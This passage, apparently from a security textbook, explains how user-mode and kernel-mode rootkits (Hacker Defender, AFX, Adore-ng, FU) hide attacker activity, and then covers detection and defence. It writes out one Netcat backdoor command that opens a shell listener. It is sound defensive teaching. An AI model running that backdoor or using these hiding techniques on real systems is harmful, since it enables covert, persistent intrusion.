All of this action is controlled by a configuration file that is included with Hacker Defender. In this INI file, the attacker has to specify in advance each of the elements that needs to be hidden, using a convenient syntax, such as [Hidden Ports] TCP:port_num and Hidden RegValues [reg_key_name]. Although this configuration file format is pretty straightforward, it does take some getting used to. What’s more, if, after installing Hacker Defender, the attackers create any additional artifacts on the system, they have to remember to go back to the INI file and tweak it to hide their new items. If they forget to do so, a diligent system administrator might notice the attackers’ presence. To help alleviate this concern, an attacker can configure the INI file with wildcard characters, so that all files, processes, and Registry keys that start with a given sequence of characters will be hidden, regardless of when they are created after the rootkit is installed. By default, any of these items whose name starts with hxdef is hidden.

Figures 10.12a and 10.12b (on pages 600 and 601) show Hacker Defender in action. For this demonstration, the attacker ran a Netcat backdoor listener, which was named evilnc.exe, on TCP port 2222 ready to invoke cmd.exe on receiving a connection (using the syntax evilnc.exe -L -p 2222 -e cmd.exe, of course). As you can see in Figure 10.12a, before the rootkit is installed, we can see the Hacker Defender rootkit and its configuration file in the file viewer (named hxdef100). The netstat command shows TCP port 2222 listening for connections, and the evilnc.exe process is visible in Task Manager. Then, the attacker installed the rootkit simply by running its executable file with administrator privileges. After the rootkit is installed, in Figure 10.12b, the hxdef100 rootkit executable and configuration file, as well as TCP port 2222 and the evilnc.exe process, simply disappear. Yet, the evil Netcat backdoor continues to run, offering the attacker remote access to the box, well hidden by Hacker Defender.

Figure 10.12a. The system before Hacker Defender is installed.

Image

Figure 10.12b. The same system after Hacker Defender is installed.

Image

Besides Hacker Defender, another popular user-mode rootkit for Windows is the AFX Windows Rootkit, written by a developer who calls himself Aphex. This tool was originally released in 2003, but has been updated several times since then. As with Hacker Defender, the AFX Windows Rootkit uses API hooking techniques to hide files, processes, Registry keys, and TCP and UDP ports. What makes this tool special is its ability to create a hidden world for the attacker on the victim machine.

Remember how we mentioned earlier that an attacker must remember to hide new artifacts carefully by tweaking the INI configuration file for Hacker Defender? If the attacker gets sloppy, some artifacts won’t be hidden, giving a suspicious system administrator the ability to detect the attacker. The AFX Windows Rootkit avoids this concern in a particularly ingenious way: It centers everything around the concept of a single hidden directory. As illustrated in Figure 10.13, the attacker places the AFX Windows Rootkit executable in one directory on the victim machine and runs it. The rootkit then hides this rootkit directory from view. Then, everything else that happens from this rootkit directory is hidden. Any files or subdirectories created in the rootkit directory are hidden. Any executables that run out of the rootkit directory or its subdirectories will have hidden processes. Any Registry keys created by these invisible processes will be hidden. And, any TCP or UDP ports used by processes running out of the rootkit directory will be hidden. In other words, the attacker doesn’t have to remember to go back and hide any newly created artifacts on the system. As long as the bad guy works out of the hidden directory, all items will be automatically invisible on the machine. The rootkit maintains an inventory of artifacts on behalf of the attacker, and hides them in a systematic way. In a sense, the rootkit erects a cone of invisibility around the hidden directory, not letting system administrators or users see what is happening inside. No rootkit configuration is therefore necessary by the attacker, because everything is hidden automatically.

Figure 10.13 The AFX Windows Rootkit creates a “cone of invisibility” centered around the rootkit directory.

Image

Defending Against User-Mode Rootkits

Don’t Let the Bad Guys Get Super-User Access in the First Place!

As we have seen, user-mode rootkits are quite powerful, and preventing their installation is certainly a worthwhile pursuit. As we’ve noted, an attacker must first conquer super-user access to install a rootkit. By preventing an attacker from getting root, SYSTEM, or administrator access in the first place, you prevent them from installing rootkits. Therefore, everything we’ve discussed about securing a system throughout this book, including using difficult-to-guess passwords, applying security patches, and closing unused ports, are very helpful in preventing attackers from gaining super-user access and installing rootkits. If you are a system, security, or network administrator, your organization must have a defined security program in place for hardening systems and maintaining their security.

One set of tools that can help you harden your systems is created by the Center for Internet Security (CIS), a volunteer group focused on improving the security state of systems on the Internet. Their hardening templates, available for free at www.cisecurity.org, are a great starting point for improving the security of your systems. They’ve released hardening templates for Windows 2000, Windows XP, Solaris, HP-UX, Linux, Cisco routers, and even Oracle databases, among other system types. Each template provides dozens and in some cases hundreds of tweaks of various operating system and infrastructure settings to harden the systems beyond their default stance. Keep in mind however, that these templates are merely a starting point; one size doesn’t necessarily fit all. For example, the Windows XP template offered by CIS might harden your system so much that your particular mix of applications can no longer function, given its reliance on default system settings. At the same time, their Linux template might not harden a system enough to meet your super-duper, ultra-tough security needs. That’s not to say that their Windows XP settings are particularly strong or their Linux ones are weak. All of their templates were created by a consensus among large numbers of people to fit “typical” environments. Thus, start with the CIS templates and tweak them appropriately to meet your needs. As a bonus, CIS offers free scoring tools to compare your existing configurations to the CIS templates, so you can see how out of joint or in the groove you already are.

File Integrity Checkers

Unfortunately, even if you keep your system hardened, an attacker might still find some unknown hole in your system, gain root, and install a rootkit. There is no such thing as 100 percent security; flaws in information protection schemes happen. So how can you detect a rootkit once it is installed? As we have seen, the computer underground has very carefully designed rootkits to foil detection. However, all is not lost. We can pierce their veils of secrecy.

One of the best ways to detect user-mode rootkits is to use cryptographically strong digital fingerprint technologies to periodically verify the integrity of critical system files. A file-integrity checking tool does just that, and is very helpful in protecting systems against user-mode rootkits. By calculating cryptographic fingerprints of sensitive system files and comparing against a trusted base of good fingerprints, a file integrity checker can detect alterations made by the attacker who has replaced files, altered libraries, or even included nasty new stuff in critical system directories. These tools use one-way hash functions, such as MD5 and SHA-1, to create a unique sequence of bits (a digital fingerprint, essentially) based on the contents of a given file or directory. Because MD5 and SHA-1 are one-way hash functions, an attacker will not easily be able to determine how to modify the file in such a way so that its MD5 and SHA-1 fingerprints remain the same. Therefore, a system or security administrator should create a read-only database of cryptographic hashes for critical system files, store these hashes offline, and periodically compare hashes of the active programs to the stored hashes looking for changes.

When deploying a file integrity checker in this way, I strongly encourage you to configure the tool to create hashes using at least two separate hashing algorithms, such as both MD5 and SHA-1. Some recent research has indicated weaknesses in both MD5 and SHA-1 hashes that could allow an attacker to create two different executables with the same MD5 or SHA-1 hash, a problem known as a hash collision. Yet, although both MD5 and SHA-1 have had some problems discovered, it remains pretty darned unlikely that someone could purposely create collisions in both MD5 and SHA-1 at the same time, so you can get a reasonable level of protection by applying two or more hash algorithms in parallel. That is, run both MD5 and SHA-1 hashes and use your file integrity checking tool to automatically look for discrepancies. The particularly paranoid reader might want to consider running a file integrity checking tool that uses one or more hash algorithms in addition to MD5 and SHA-1, such as RIPEMD-160. Most of today’s tools support MD5 and SHA-1. In the future, additional algorithms will likely be added.

Tripwire is a wonderful file integrity checking tool originally written by Gene Spafford and Gene Kim of Purdue University. Tripwire generates hashes of critical files and directories. On a Linux or UNIX system, Tripwire can look for changes in the login, sshd, ifconfig, ls, ps, and du files, among the many other executables frequently changed by user-mode rootkits. On a Windows machine, Tripwire can look for additions or changes to the critical system32 directory where many Windows rootkits drop executables and libraries that tweak the system’s behavior. A free version of Tripwire is available for noncommercial use on Linux at www.tripwire.org. Furthermore, Tripwire has been commercialized at www.tripwire.com, so commercial support is also available. Other free and open-source file integrity checking solutions include the Advanced Intrusion Detection Engine (AIDE) and Osiris. Beyond Tripwire, AIDE, and Osiris, more than a dozen other vendors sell file integrity checking solutions, including GFI Languard System Integrity Monitor, Ionx Data Sentinel, and others.

The trusted hashes or signatures created by any of these tools should be stored on read-only media (such as a write-protected USB token drive or a write-once CD-ROM). You should check the hashes of your critical executables against this safe database on a regular basis (such as hourly, daily, or weekly) and all changes must be reconciled with any normal system administration changes on the box. Of course, an integrity checking tool works best if you apply it before an attack occurs, so you have a secure baseline of hashes to compare against. If you are comparing the hash of a backdoor login or sshd executable with the hash of the same backdoor from a week earlier, you won’t detect any problems. You must compare against a trusted baseline, like the original system installation or a recent patch. Therefore, you must have a policy and processes regarding running file integrity checkers on all critical systems. To help establish a safe baseline, various organizations offer hashes of critical components of trusted versions of operating systems available for access on the Web. The Web site www.knowngoods.org has hashes for numerous Linux and UNIX system types. What’s more, the National Institute of Standards and Technology (NIST) offers a free database of various system hashes online via their National Software Reference Library (NSRL) at www.nsrl.nist.gov. This massive index includes the MD5 and SHA-1 hashes for more than 25 million different files associated with popular operating systems and applications.

When running a file integrity checker, make sure you analyze its output and reconcile all changes to critical system files. Why did your login program change? Did anything else change? Was it the result of a legitimate system patch or other upgrade a system administrator applied since you last ran the integrity check? If not, your system might have been rootkitted.

Uh-oh ... They Rootkitted Me. How Do I Recover?

If you detect a rootkit on your system, you have a significant problem. An attacker has gained super-user-level access to your system (after all, he or she needed super-user privileges to alter the operating system). When a system has a super-user compromise, it can be very difficult to determine all the files the attacker might have modified. Of course, your file integrity checking program will indicate which of your critical system files have been altered. So, can you simply replace those programs with the original, trusted versions? Unfortunately, the answer is “No.” The attacker might have laced your system with other backdoors and Trojan horse applications. Consider a scenario where the attacker gets in, installs a rootkit, and then starts modifying other applications (such as your database management system, your text editor, or even that Solitaire game included in your operating system) to reinstall the rootkit when they are executed. You might discover the rootkit using a file integrity checker. You methodically replace all of the files that the checker said were altered. However, your file integrity checker wasn’t configured to check your Solitaire executable, because it’s not considered a sensitive file. The next time some bored administrator runs Solitaire, the system gets re-rootkitted, and you won’t know until you run your file integrity checker again. Countless similar scenarios exist, demonstrating that manually cleaning up after a rootkit installation is difficult, if not impossible.

To be truly sure you eliminate all of the little surprises left by an attacker with super-user access, you should really completely reinstall all operating system components and applications, just to make sure the system is clean. You could rebuild the system from the original distribution media (CDs and downloaded patches). Alternatively, you could use the most recent trusted backup to restore the system. A trusted backup is an image of the system that is known to not have any system compromises. For example, your most recent file-integrity-checked backup can be trusted, because you used a file integrity checker to verify the integrity of the system files. For this reason, it is a great idea to synchronize your file system integrity checks with your backup procedures.

There are additional defenses against user-mode rootkits, including automated rootkit checkers and antivirus tools. However, such defenses help protect against not only user-mode rootkits, but also the nastiest form of Trojan horse backdoor we face on a regular basis today, kernel-mode rootkits. Therefore, we cover those additional defenses after exploring kernel-mode rootkits in detail.

Nastiest: Kernel-Mode Rootkits

We’ve seen the power of user-mode rootkits, but we’ve also seen how to defeat them using cryptographic integrity checks of our sensitive system files. But wait ... there’s more. The most recent evolutionary step in rootkits goes beyond the user-mode rootkit strategy of altering the executables, libraries, and processes that users rely on. Now, rootkits are increasingly being implemented at the kernel level, making them far more difficult to detect and control. Kernel-mode rootkits are a highly active area of development in the computer underground, with new examples being released on a regular basis.

In most operating systems (including various Linux and UNIX systems, as well as Windows), the kernel is the fundamental, underlying part of the operating system that controls access to network devices, processes, system memory, disks, and so on. All resources on the system are controlled and coordinated through the kernel. In other words, everything that happens on the system goes through the kernel to get work done in the real world. For example, when you open a file, your application sends a request to the kernel to open the file, which gathers the bits from the hard drive and passes them to your file-viewing application. Kernel-mode rootkits give an attacker complete control of the underlying system, a powerful position to be in for an attacker.

Back to our tired soup-eating analogy from Table 10.2. A user-mode rootkit replaces or alters the potatoes in your soup with genetically modified potatoes. A file-integrity checker (such as Tripwire) acts as a soup ingredient integrity checker, comparing the molecular structure of the potatoes in your soup to known, safe potatoes. However, kernel-mode rootkits modify your tongue, the organ you use to eat, so your soup ingredient checkers just don’t work any more. It’s much more difficult to tell if your tongue is poisonous than checking your soup and its ingredients. By modifying the underlying kernel itself, the thing you use to run programs, attackers can completely control the system at the most fundamental level, allowing them great power for backdoor access and hiding on the machine. The kernel itself becomes a Trojan horse, looking like a nice, well-behaved kernel, but in actuality being rotten to the core.

Figure 10.14 shows why kernel-mode rootkits are more devious than their usermode siblings. Whereas a user-mode rootkit alters the eyes and ears of a system administrator (i.e., replacing applications such as login, sshd, ifconfig, and ls on Linux and UNIX or hooking APIs used by Task Manager, netstat, and the File Explorer on Windows), a kernel-mode rootkit actually alters parts of the system administrator’s brain. After all, in my experience, I and many system administrators feel that the kernel is an extension of our brains, controlling basic functions of the computer system, just like my brainstem keeps me breathing. Kernel-mode rootkits take advantage of this by modifying the kernel to transform the system completely and transparently to conform to the attacker’s needs. If the kernel cannot be trusted, you can trust nothing on the system.

Figure 10.14 Comparing user-mode rootkits with kernel-mode rootkits.

Image

The Power of Execution Redirection

What can attackers do with the power to manipulate your kernel? Many kernel-mode rootkits include a capability called execution redirection. This feature intercepts calls to run certain applications and maps those calls to run another application of the attacker’s choosing. It’s the classic bait-and-switch trap. The user or administrator says to run program foo, the kernel pretends to run foo, but then the kernel actually runs a different program called bar.

Think about the power of execution redirection! Consider a scenario involving the UNIX sshd routine. The attacker installs a kernel-mode rootkit and leaves the existing sshd executable file itself unaltered. All execution requests for sshd (which occur when anyone logs into the system using SSH), will be mapped to the hidden file /usr/sbin/backdoor_sshd. When a user tries to log in with SSH, the /usr/sbin/backdoor_sshd program will be executed, containing a backdoor password allowing for remote root-level access. However, when the system administrator runs a file integrity checker, the standard sshd routine is analyzed. Only execution is redirected; you can look at the original file sshd and verify its integrity. This original routine is unaltered, so the cryptographic hash remains the same.

On a Windows machine, the bad guy can perform a similar execution redirection maneuver to the Task Manager or netstat executables. You think you are getting a good process list from a good Task Manager, and a truthful set of listening ports from a wholesome netstat program. And, in fact, these programs are indeed intact in the file system. But whenever you try to run Task Manager or netstat, the kernel pulls the rug out from under you, running an evil version of each program squirreled away somewhere in the file system. Again, your file integrity checker is none the wiser, because it will be looking at the intact Task Manager and netstat executables in your file system.

Execution redirection allows attackers to modify victim systems at their whim, while masking all of their alterations. The attacker creates an alternate universe in the victim computer that looks nice and happy. You can browse around your file system, look at various executables, and even calculate strong cryptographic hashes of them. Everything looks wonderfully intact. However, the system you are observing is a lie, because whenever you want to run a specific program, the kernel will run something else. You want to run sshd? You’ll actually run /usr/sbin/backdoor_sshd. You want to run Task Manager? You’ll actually run Hacked_Task_Manager. This execution redirection is some pretty nasty stuff, allowing an attacker to make any executable on your system a potential Trojan horse backdoor.

A good image of the bizarreness that execution redirection introduces is the movie The Matrix. In that movie, the characters are exposed to two worlds: a computer-simulated world and reality. It is often difficult to determine during the movie whether the actors are in the real world or the computer simulation, leading to all kinds of cool plot twists. Kernel-mode rootkits with execution redirection are quite similar, in that you never know whether you are in fact running the program you think you are running or an attacker’s substitute. You just think you are executing a certain program, but it’s up to the hidden attacker to determine what is going on in reality, just like the evil programs in The Matrix. Your whole system could be a sham, a brilliant simulation of an intact operating system created by the bad guys to trick you into thinking that everything is okay, even though the system is rotten to the core, quite literally.

File Hiding with Kernel-Mode Rootkits

“Well,” you say, “I’ll just look for the /usr/sbin/backdoor_sshd, the Hacked_Task_Manager programs, or any other things the attacker adds to the file system.” Unfortunately, kernel-mode rootkits go beyond execution redirection. Many kernel-mode rootkits support file hiding. The attacker configures the victim machine so that anyone looking around the file system will see only what the attacker wants. Specific directories and files can be hidden. Sure, they’re still there on the system, and if you know about them, you can change directories, run executable files, and store data in those files, but you just cannot see them in a file listing.

This file hiding is implemented in the kernel, making it very efficient for the attackers. Although a user-mode rootkit replaced the ls program to hide files, the attacker has to worry that you might come along with another program to look at a list of files, such as the echo * command, which shows the contents of a directory on most Linux and UNIX systems. However, a kernel-mode rootkit can modify the kernel to lie to the intact ls program, the echo * command, and any other file listing command you attempt to run. Therefore, if you have any other applications that provide a file list (such as the Linux dir command, or the very useful lsof program), the kernel will lie to them as well about the contents of the file system, masking the attacker’s presence. Similarly, on a Windows machine, the attacker can alter the underlying Windows kernel to lie to your Windows File Explorer and dir commands to hide the bad guy’s items stored in your file system.

Process Hiding with Kernel-Mode Rootkits

Another common feature of kernel-mode rootkits is the ability to hide any running processes of the attacker’s choosing. The attacker might set up a Netcat backdoor listener, as described earlier in this chapter. To prevent detection of this running process, the attacker could use a kernel-mode rootkit to hide that Netcat process. Any application that tries to look at the process table (such as the ps or lsof commands in UNIX or Linux or the Task Manager in Windows) will get a wrong answer from the kernel, conveniently omitting the results the attacker doesn’t want you to see. The attacker can make any process just disappear, while it continues to run. If anyone asks about the process or a complete process list, the rootkitted kernel will lie and say that no such process exists.

Network Hiding with Kernel-Mode Rootkits

When a process listens on a specific TCP or UDP port, it can be detected using the command netstat -na, as we discussed in Chapter 6 and earlier in this chapter. This command relies on the kernel to determine which ports are currently active and listening. If an attacker runs a backdoor listener on the victim machine, the listening port will be displayed, discoverable by an investigator. To avoid such discoveries, many kernel-mode rootkits offer capabilities for masking particular network port usage. For example, the attacker can direct the kernel to lie about TCP port number 2222 when anyone asks for a port listing. Regardless of the program run on the local system to determine which ports are open (netstat or whatever else, such as lsof -i on UNIX or Linux or TCPView, ActivePorts, or Fport on Windows), the rotten kernel will mask the backdoor listener on this port.

Whereas network hiding works for all requests for network port usage run locally on the victim machine, a port scan across the network (using a tool like Nmap, as discussed in Chapter 6) will show the listening port. The remote tool measuring for open ports across the network will not be blinded by the kernel, which tricks all local commands that are run on the victim machine. Therefore, periodic scans of your own systems across the network are incredibly useful.

Some Particular Examples of Kernel-Mode Rootkits

A wide variety of kernel-mode rootkits are available today. Let’s discuss a couple of the most powerful and useful examples: Adore-ng for Linux and FreeBSD and the FU rootkit for Windows.

Adore-ng: A Linux Kernel-Mode Rootkit

Adore-ng is a kernel-mode rootkit that targets Linux systems running kernel 2.4, 2.5, and 2.6. The tool has also been ported to FreeBSD. Adore-ng has a variety of standard kernel-mode rootkit capabilities, including execution redirection, file hiding, process hiding, and network hiding. Additionally, it includes numerous nifty features, such as these:

  • Promiscuous mode hiding. As we discussed in Chapter 8, attackers often run a sniffer on their victim machines to gather sensitive information sent between other systems across the network. The attacker can hide the running sniffer program itself easily using file and process hiding. However, sniffers typically put the Ethernet interface in promiscuous mode to gather all packets from the LAN, which the administrator can detect using the ip link commands on some versions of Linux and ifconfig on some versions of UNIX. Adore-ng alters the kernel so that it lies about promiscuous mode, helping to make the sniffer even stealthier. Interestingly, this promiscuous-mode hiding feature is intelligent, in that the evil kernel analyzes whether an administrator or an attacker ran a sniffer to place the interface in promiscuous mode. Think about it. If the evil kernel always lied about promiscuous mode, saying that it never exists, a suspicious administrator could catch the kernel in a lie and detect the attackers’ presence. On Linux, the admin could simply run ip link and see if the interface is in promiscuous mode. If not, the administrator can then run a sniffer (such as tcpdump), forcing the interface into promiscuous mode. Now, when the admin runs ip link or ifconfig to check for promiscuous mode, we have a chance to catch the kernel in a lie! If the system does not show promiscuous mode, we know it is lying, because the admin just forced it into that mode. Older kernel-mode rootkits did not intelligently hide promiscuous mode. The newer ones, like Adore-ng, are smarter, and check to see if the sniffer is run by an admin or the attacker. If an admin fires up the sniffer, the system displays promiscuous mode like normal. But if an attacker runs a sniffer, the kernel will lie about its promiscuous effects.
  • Process hiding. Adore-ng can take any running process and cloak it. At the request of the attacker, the kernel suppresses all information about the given process. While the process continues to run, all use of the ps, lsof, or other process viewing commands will not show the process. This feature reminds me of the Romulans in the Star Trek sci-fi series. When the Romulans are getting ready to attack, they activate their ship’s cloaking device. All traces of their spaceship eerily disappear, while the ship continues to attack. However, if you remember your Star Trek lore, the Romulans cannot use their photon torpedoes while cloaked. Adore-ng does not have any such limitation.
  • Kernel-module hiding. On Linux, the lsmod command provides a list of kernel modules currently installed on a machine. The attacker does not want the system administrator to see the Adore-ng module loaded into the system’s kernel. The Adore-ng tool therefore hides itself from lsmod, tweaking the kernel to lie about the kernel’s own status.

Adore-ng also includes a built-in backdoor that lets an attacker connect to the system across the network and gain a root-level command shell prompt. This is pretty straightforward stuff, as we’ve seen Netcat do the very same thing. The nice innovation of Adore-ng is including the capability in a kernel module itself, so the attacker doesn’t have to mess around with installing and configuring a separate backdoor tool. Everything is included in one nice package: the hiding prowess of the kernel-mode rootkit, along with a nice backdoor shell listener. This approach is very difficult to detect, because no indications of files, processes, or listening network ports are available to the system administrator.

The Windows FU Kernel-Mode Rootkit

Kernel-mode rootkits aren’t limited to the Linux and UNIX world. For Windows, a very powerful kernel-mode Rootkit is called FU. Its author, a researcher named Fuzen, points out that his rootkit’s name is a take-off on the Unix command su for substituting users. Thus, its name is to be pronounced “eff-yoo” instead of “foo,” a distinction I think he makes because he enjoys hearing people say “FU.” Anyway, this very full-featured rootkit directly manipulates Windows kernel memory on Windows 2000, XP, and 2003 machines. The tool consists of a special device driver, named msdirectx.sys, which some users might mistake for Microsoft’s own DirectX tool, an environment for developing graphics, sound, music, and animation programs such as games.

As is common for kernel-mode rootkits, FU can hide an attacker’s processes on the machine. Additionally, FU can alter the privileges of any running process to any level the attacker wants, on the fly without even stopping the process. You might have a program running with really limited privileges, just plodding along doing some work. FU comes along, at the direction of the attacker, and instantly gooses this process up to SYSTEM privileges, so the attacker can utilize the process for some nefarious goal. The process is happy with its newfound privileges, until the attacker abuses it, possibly altering the system to edit logs, install a backdoor, or change user account settings.

Furthermore, FU hides selected types of events from the Windows Event Viewer, so an administrator will not be able to see specific actions taken by the attacker when running the Event Viewer locally on the machine. The attacker might want to hide events associated with the bad guy’s own logon and source IP address. Of course, if event logs are forwarded to a separate, nonrootkitted machine, the administrator will be able to view them properly there. That’s why heavily secured, separate logging servers are such a good idea for defenders to know what is really happening on their machines. Finally, FU can even hide device drivers, including itself, so an administrator cannot see them installed on the system.

Defending Against Kernel-Mode Rootkits

Fighting Fire with Fire: Don’t Do It!

I frequently get asked whether someone should install a kernel-mode rootkit on their own systems on a proactive basis before an attacker does. The idea is that if I install Adore-ng on my own machine, then an attacker won’t be able to do it after me, and I’ll have the upper hand. I very much disagree with this philosophy. If you try to fight fire with fire, you very well could burn down your house!

This is a bad idea for several reasons. First, without a detailed understanding of the particular kernel-mode rootkit you install, you might make your system more vulnerable to a highly skilled attacker who understands the tool better than you do. Furthermore, a kernel-mode rootkit makes the system inherently more difficult to understand and analyze. If your machine is compromised, the postmortem forensics analysis gets significantly trickier with a kernel-mode rootkit in place. You might have to remap every executable, file, process, or network request to determine what has really happened on your system. This more complex analysis would be unwelcome news in a sensitive investigation. Finally, theoretically, multiple kernel-mode rootkits of different types could be installed on a system at the same time, possibly without interacting with each other in a negative way. Therefore, just because you have installed Adore-ng, nothing prevents the attacker from taking over the system and installing a home-grown kernel-mode rootkit right on top of it. So, your installation of Adore-ng isn’t necessarily locking out other rootkits.

Sure, you can play with kernel-mode rootkits in your protected lab to learn more about them. However, I strongly recommend that you do not install a kernel-mode rootkit on your own production systems.

Don’t Let Them Get Root in the First Place!

A recurring theme in this book is preventing attackers from gaining super-user access on your machines in the first place. Although it might sound repetitive, I can’t overstress it: You must configure your systems securely, disabling all unneeded services and applying all relevant security patches. Without super-user access, an attacker cannot install a kernel-mode rootkit (or a user-mode rootkit, for that matter). Hardening your systems and keeping them patched are the best preventative means for dealing with kernel-mode rootkits.

Control Access to Your Kernel

You also might want to turn to some freely available tools to help limit attackers’ actions on your systems. One noteworthy free tool for identifying and controlling the flow of action between user mode and kernel mode on Linux and UNIX is Systrace by Niels Provos, available at www.citi.umich.edu/u/provos/systrace. Don’t get confused by the name Systrace. Another tool, called strace, merely shows the system calls made by an application into the kernel. Systrace goes far beyond simple strace. Once installed on Linux, FreeBSD, and Mac OS X machines, Systrace tracks and limits the system calls that individual applications can make.

Cisco’s Security Agent (called CSA for short) and McAfee’s Entercept products perform similar duties on a commercial basis. CSA runs on Windows and Solaris, whereas McAfee’s Entercept is available for Windows, Solaris, and HP-UX. In fact, these so-called host-based IPSs offer a variety of protection strategies, like providing system configuration hardening. However one of the most worthwhile capabilities of Systrace, CSA, and Entercept involves limiting the calls that various applications can make into the kernel on the machine. By configuring the host-based IPS to limit which system calls a given program (such as a Web server, mail reader, or database application) can make, the bad guys will have a far more difficult time compromising administrator privileges and installing rootkits. It’s just harder for the bad guys to invade the kernel when they are trapped in the straightjacket of a good host-based IPS. In effect, Systrace, CSA, and Entercept are wrapping the kernel in a protective layer of software to block unusual activity.

Although such tools are very useful in hardening a kernel against attack, do not underestimate the time necessary to train these tools about what is “normal” for your given machine. The tools must first characterize normal access of the kernel for a given application mix on a box. Then, they stop all abnormal access. However, this training for normal activity can take weeks, and must be done on a trusted system not compromised by an attacker. If you train a tool on a compromised machine, you’ll have a tool that is imprinted on abnormal behavior, a very sad and dangerous thing.

Looking for Traces of Kernel-Mode Rootkits by Hand

To detect the presence of kernel-mode rootkits, some people suggest trying to tickle various features of the rootkits to see if they are present on a machine. By looking for features of some of the kernel-mode rootkits, you might detect their installation. For example, as we discussed earlier, you could activate a sniffer to check to see if promiscuous mode is suppressed. If the sniffer is running but promiscuous mode is not shown, you will identify some kernel-mode rootkits. Unfortunately, this technique won’t detect all of them, including Adore-ng.

Although these techniques certainly work for some kernel-mode rootkits, there is just too much variety for these techniques to catch a large number of attacks by hand. Furthermore, a significant amount of manual intervention is involved in searching for the presence of these kernel-mode rootkit features on a one-by-one basis. Therefore, although these techniques might be a good idea if you suspect a kernel-mode rootkit is already installed, how do you get suspicious in the first place? When do you know to investigate further?

Automated Rootkit Checkers

By looking for various system anomalies introduced by kernel-mode rootkits in an automated fashion, various automated rootkit checkers are incredibly useful in investigations. For you fans of The Matrix movies, these tools are really looking for glitches in the Matrix. As you might recall, in the movie, glitches in the Matrix occur when the bad guys start changing things, creating a déjà vu in the movie. Similarly, with a kernel-mode rootkit, an inconsistency in the system’s appearance could be an indication that something foul has been installed. Automated rootkit checkers perform various tests that can be used to catch the kernel in a lie about the existence of certain files and directories, network interface promiscuous mode, and other issues that kernel-mode rootkits generally fib about.

In particular, the free Chkrootkit tool at www.chkrootkit.org can detect more than 50 kernel-mode and user-mode rootkits running on Linux, FreeBSD, OpenBSD, NetBSD, Solaris, HP-UX, and True64. Chkrootkit first scans various system executables, looking for the fingerprints of very popular user-mode rootkits. Next, it searches for hidden processes by comparing the contents of the /proc directory with the results returned by the ps command. The directory /proc stores information about each running process on the system. If the ps command does not show all processes indicated by /proc, some of the processes are being hidden. This technique will turn up most user-mode rootkits, and some kernel-mode rootkits. Unfortunately, a sophisticated kernel-mode rootkit will modify what Chkrootkit can see in /proc, making the attacker too stealthy to be detected by this technique.

Another way that Chkrootkit finds kernel-mode rootkits is by looking for inconsistencies in the directory structure when a file or directory is hidden. Each directory in the file system has a link count, which indicates the number of other directories that a given directory is connected to in the file system structure. For each directory, this link count should be two more than the number of subdirectories in the directory. That way, the directory would have one link for each subdirectory, plus one for the parent directory (..) and one for itself (.). Many kernel-mode rootkits hide files and directories without manipulating the link count of the parent directory. Chkrootkit combs through the entire directory structure, counting the number of subdirectories that it can see inside each directory and comparing it to the link count. If it finds a discrepancy, Chkrootkit prints a message indicating that there might very well be directories that are hidden by a kernel-mode rootkit.

Rootkit Hunter, available for free at www.rootkit.nl/projects/rootkit_hunter.html, is a similar tool to Chkrootkit, but it runs on Linux, FreeBSD, OpenBSD, Solaris, and AIX. I use Rootkit Hunter to get a second opinion on potentially compromised UNIX or Linux machines, augmenting the results of my Chkrootkit scan.

Whereas Chkrootkit and Rootkit Hunter focus on Linux and UNIX systems, similar tools exist for Windows, namely Rootkit Revealer by Mark Russinovich at www.sysinternals.com and Blacklight by the antivirus vendor F-Secure at www.f-secure.com/blacklight. Both tools are available for free and do a fantastic job of detecting Windows rootkits, both the user-mode and kernel-mode variants. To accomplish this, these tools run in both user mode and in kernel mode, looking for discrepancies between what is visible in user mode and what is viewable inside the kernel regarding the file system and registry. For example, suppose a user-mode or kernel-mode rootkit hides some files from view. The user-mode component of these Windows rootkit checkers will therefore not be able to see these hidden files. However, the kernel-mode component of the rootkit checker will see the files, and flag the discrepancy for an administrator. Bingo! We’ve detected the rootkit.

However, it is important to note that you might get a false positive notification from any of these automated rootkit checking tools, whether for Linux/UNIX or Windows. Some completely benign programs do introduce the anomalies that these tools look for, particular security tools running on a Windows environment. Some legitimate personal firewall tools and antivirus programs try to hide files and processes from users and malicious code by altering the system using the same techniques as user-mode and kernel-mode rootkits. These rootkit detectors discover these hiding tactics and warn their users of a potential rootkit infestation. So, in effect, we’ve got security software (the automated rootkit checkers) detecting the techniques used by other security software (personal firewalls and antivirus tools) while it tries to hide from malicious software (worms, bots, and even rootkits). Making matters even more interesting, some of the antivirus tools alert while a rootkit checker like Rootkit Revealer or Blacklight execute, because they notice the calls made into the kernel by these tools, which would be suspicious under other circumstances.

File Integrity Checkers Still Help!

Although they can be tricked by very thorough kernel-mode rootkits, you should still use file integrity checking tools, such as the Tripwire, AIDE, and related programs. As we’ve discussed, a thorough bad guy will configure the manipulated kernel with execution redirection and other alterations that lie to a file integrity checker about all file changes on the system. If the attackers very carefully cover all of their tracks, they can fool a file integrity checker. In other words, a perfectly implemented and perfectly deployed kernel-mode rootkit can trick a file integrity checker into thinking that everything is okay on a system.

However, a less careful attacker might forget to configure the kernel-mode rootkit to hide alterations to one or two sensitive system files. Even a single mistake in the file-hiding configuration of the kernel-mode rootkit by the bad guys could expose them to detection by your file integrity checker. Alternatively, if the bad guy’s rootkit code is flawed in a subtle way, the file integrity checking tool might still have a chance of detecting the changes. Therefore, don’t throw out the baby with the bathwater! File integrity checking tools remain very valuable, even though a kernel-mode rootkit can foil them if the attacker is very careful. I’d rather not depend solely on the attackers making mistakes to discover their treachery, but you had better believe I’ll be sure to take thorough advantage of their errors. Deploying file integrity checking tools on all of my sensitive systems lets me prepare for such circumstances.

Antivirus Tools Help Too!

Most antivirus solutions have signatures for dozens of different rootkits, both of the user-mode and kernel-mode varieties. When they detect a file from a rootkit, most antivirus tools prevent the program from being accessed. Therefore, the rootkit cannot be installed on the system in the first place. Antivirus tools therefore offer preventative controls for thwarting many rootkits. So, by using antivirus tools, you’ll raise the bar against casual attackers using rootkits. The bad guy will have to be smart enough to first disable the antivirus tool, dodge it, or modify its signature base, before installing the rootkit. In the end, we raise the bar to catch the less skilled bad guys. Sure, the more skilled guys will jump over the bar, but we’ve still got a chance at discovering them when they get sloppy or lazy.

Trusted CDs for Incident Handling and Investigations

When investigating potential rootkit attacks, remember that the operating system software itself might lie to you about what’s happening on the machine. If you can’t trust the existing system executables, running process, or even the kernel, what can you do to determine the true status of the system? First, get a solid backup of the machine before even considering shutting it down. That’ll give you some good evidence for your analysis. Shutting down a system gracefully will change hundreds of files, so get your backup first if you ever intend to perform forensics analysis.

